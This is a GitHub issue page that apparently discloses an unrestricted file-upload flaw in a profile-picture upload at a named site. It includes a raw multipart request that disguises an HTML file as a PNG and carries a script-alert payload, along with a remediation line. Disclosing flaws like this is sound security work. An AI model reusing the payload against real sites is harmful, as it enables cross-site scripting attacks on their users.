We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
It is possible to upload malicious file to run from profile picture upload using http://ems.tserm.com/user_action.php
http://ems.tserm.com/user_action.php
Vulnerable parameter: "filename" Vulnerable file: /user_action.php
------WebKitFormBoundarycC5ce2YBWSdAerAB Content-Disposition: form-data; name="file"; filename="**Untitled.png.html**" Content-Type: image/png **<script>alert(1)</script>** ------WebKitFormBoundarycC5ce2YBWSdAerAB--
Remediation: Do not allow user to upload files other than images.
The text was updated successfully, but these errors were encountered:
No branches or pull requests
It is possible to upload malicious file to run from profile picture upload using
http://ems.tserm.com/user_action.phpVulnerable parameter: "filename"
Vulnerable file: /user_action.php
Remediation: Do not allow user to upload files other than images.
The text was updated successfully, but these errors were encountered: